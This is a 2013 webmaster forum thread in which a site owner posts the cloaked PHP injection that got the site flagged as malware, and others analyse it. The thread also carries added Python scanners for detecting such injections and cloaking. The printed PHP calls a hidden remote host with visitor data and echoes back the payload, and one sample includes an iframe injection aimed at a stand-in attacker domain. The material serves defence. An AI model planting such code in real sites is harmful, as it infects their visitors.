Strange Virus Notice for Website
AVG and eset nod32 shows virus notice
klpm
msg:4569610
9:36 am on May 1, 2013 (gmt 0)

Hello,

Since yesterday, both AVG and ESET NOD32 have not allowed access to one of our websites.

I did not find any malicious code when I checked the source code.

I am desperately looking to resolve the issue.

Check [snip]


ESET NOD says the site is infected with Kryptik.ajz.

AVG says Blackhole exploit Trojan.

[edited by: phranque at 10:36 am (utc) on May 1, 2013]
[edit reason] no personal urls please [/edit]

phranque
msg:4569624
10:37 am on May 1, 2013 (gmt 0)

welcome to WebmasterWorld, klpm!


I would look for any obfuscated JavaScript, and especially anything that looks like a document.write or similar.

klpm
msg:4569630
11:59 am on May 1, 2013 (gmt 0)

Thanks phranque, but I finally figured it out and solved the issue (thanks to the "temporary disable" option in AVG).

I would like to share the code, thinking it may help other website owners.

The code was acting very smart.

The malicious code is not generated if the page is accessed by a search bot such as Google, MSN or Yahoo (so that the website owner does not come to know about the virus infection).

Check the code below:

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)
        &&(strstr($sUserAgent, 'yahoo') == false)
        &&(strstr($sUserAgent, 'baidu') == false)
        &&(strstr($sUserAgent, 'msn') == false)
        &&(strstr($sUserAgent, 'opera') == false)
        &&(strstr($sUserAgent, 'chrome') == false)
        &&(strstr($sUserAgent, 'bing') == false)
        &&(strstr($sUserAgent, 'safari') == false)
        &&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( '[some encoded malware here]')
                .'?ip='.urlencode($_SERVER['REMOTE_ADDR'])
                .'&useragent='.urlencode($sUserAgent)
                .'&domainname='.urlencode($_SERVER['HTTP_HOST'])
                .'&fullpath='.urlencode($_SERVER['REQUEST_URI'])
                .'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

[edited by: phranque at 12:45 pm (utc) on May 1, 2013]
[edit reason] sanitized [/edit]
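A static scan for this kind of injection, added here as an example and not code from the thread or from any product: it walks a webroot and scores each PHP/HTML/JS file against the indicators the posted block exhibits (a lower-cased user-agent gate, strstr() checks against a crawler list, base64_decode() feeding curl_init(), the suppressed-error `@curl_init`, and the "Looks for google serch bot" comment itself), plus the obfuscated document.write and eval(base64_decode()) shapes phranque's reply points at. The weights and the threshold are constructed for this example, as are the two sample files it scans in memory.

```python
"""Indicator scan for user-agent-cloaked PHP injections (added example)."""
import os
import re

# (name, pattern, weight). Weights/threshold are constructed for this example.
INDICATORS = [
    ("ua_gate", re.compile(r"strtolower\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]", re.I), 2),
    ("bot_list", re.compile(r"strstr\s*\(\s*\$\w+\s*,\s*['\"](?:google|yahoo|baidu|msn|bing|bot)['\"]\s*\)\s*==\s*false", re.I), 3),
    ("b64_to_curl", re.compile(r"base64_decode\s*\([^)]*\)[\s\S]{0,400}?curl_init", re.I), 4),
    ("known_comment", re.compile(r"Looks for google serch bot", re.I), 5),
    ("suppressed_curl", re.compile(r"@\s*\$\w+\s*=\s*curl_init|@curl_exec", re.I), 2),
    ("obf_docwrite", re.compile(r"document\.write\s*\(\s*(?:unescape|String\.fromCharCode|atob)\s*\(", re.I), 3),
    ("eval_b64", re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I), 4),
]
THRESHOLD = 6  # constructed: a single weak indicator alone does not flag a file


def scan_source(src):
    """Return (score, [indicator names]) for one source string."""
    hits = [name for name, rx, _w in INDICATORS if rx.search(src)]
    score = sum(w for name, _rx, w in INDICATORS if name in hits)
    return score, hits


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a webroot and report (path, score, hits) for files at or above THRESHOLD."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            score, hits = scan_source(src)
            if score >= THRESHOLD:
                findings.append((path, score, hits))
    return findings


# Constructed sample: condensed, sanitized shape of the block posted in the thread.
SAMPLE_INFECTED = r"""<?php
if (!isset($sRetry)) {
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'bot') == false)) {
$stCurlLink = base64_decode('[placeholder]').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
?>
<html><body>Hello</body></html>
"""

# Constructed sample: a benign file that reads the user agent and uses document.write.
SAMPLE_CLEAN = r"""<?php
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
if (stripos($ua, 'googlebot') !== false) { header('X-Robots-Tag: all'); }
?>
<html><body><script>document.write("<p>hi</p>");</script></body></html>
"""

if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        score, hits = scan_source(src)
        print(f"{label}: score={score} hits={hits}")
```

Run `scan_tree("/path/to/webroot")` against a copy of the site; files that score are the ones to diff against a known-good backup or the upstream package, since this injection is typically prepended to otherwise legitimate files.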

Dijkgraaf
msg:4569836
11:29 pm on May 1, 2013 (gmt 0)

It is interesting that it treats the browsers Opera, Chrome and Safari as being bots and doesn't serve them the malware.
So it must be targeting IE and Firefox.

Also, it looks like the writer of this code may not be a native English speaker, as there are multiple spelling and grammar mistakes in the comments.

A search for the phrase "Looks for google serch bot" comes up with a fair number of results dating back to at least 2010.

What you need to determine is how your site was compromised in the first place, allowing them to add the PHP script. It looks like a fair number of the sites that were infected were WordPress ones, possibly using this vulnerability.
[markmaunder.com...]
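Because the gate decides purely on the User-Agent string, a site owner can confirm cloaking from outside without antivirus by fetching the page twice, once as a crawler and once as a browser the gate does not exclude, and comparing the active content. The following is an added example, not code from the thread: `serves_payload()` copies the exclusion list from the posted block so you can see which browsers it skips (the Chrome UA contains both "chrome" and "safari", which is why Dijkgraaf sees those as "treated like bots"), and `cloaked_elements()` returns the script/iframe elements present only in the browser view. The two HTML documents are constructed; fetching the real pages (for example with `urllib.request` and two different User-Agent headers) is left to the caller.

```python
"""Cloaking check for a user-agent-gated injection (added example)."""
from html.parser import HTMLParser

# Exclusion list copied from the posted PHP block: any of these substrings in
# the lower-cased User-Agent means the payload is not fetched or echoed.
GATE_EXCLUDES = ("google", "yahoo", "baidu", "msn", "opera", "chrome", "bing", "safari", "bot")


def serves_payload(user_agent):
    """True when the posted gate would have tried to fetch and echo the payload."""
    ua = user_agent.lower()
    return not any(token in ua for token in GATE_EXCLUDES)


class _ActiveContent(HTMLParser):
    """Collects script/iframe src attributes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.items = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe") and attrs.get("src"):
            self.items.append(f"{tag} src={attrs['src']}")
        if tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._buf).strip()
            if body:
                self.items.append("script inline=" + body)
            self._in_script = False


def active_content(html):
    """List the active elements (scripts, iframes) found in an HTML document."""
    parser = _ActiveContent()
    parser.feed(html)
    parser.close()
    return parser.items


def cloaked_elements(bot_html, browser_html):
    """Active content served to the browser view but absent from the crawler view."""
    baseline = set(active_content(bot_html))
    return [item for item in active_content(browser_html) if item not in baseline]


# Constructed sample: the page as a crawler (excluded UA) would receive it.
BOT_VIEW = """<html><head><title>Shop</title>
<script src="/js/site.js"></script></head>
<body><h1>Welcome</h1></body></html>"""

# Constructed sample: the same page with an echoed payload, as a Firefox UA would receive it.
BROWSER_VIEW = """<html><head><title>Shop</title>
<script src="/js/site.js"></script></head>
<body><h1>Welcome</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//attacker.invalid/%22%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for ua in ("Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0",
               "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.36",
               "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"):
        print(f"{'payload' if serves_payload(ua) else 'no payload':10} <- {ua}")
    for item in cloaked_elements(BOT_VIEW, BROWSER_VIEW):
        print("cloaked:", item)
```

Any non-empty result from `cloaked_elements()` on a page that should be identical for all visitors is the same evidence the antivirus products were reacting to, and it points at which file's output to inspect on the server.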

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved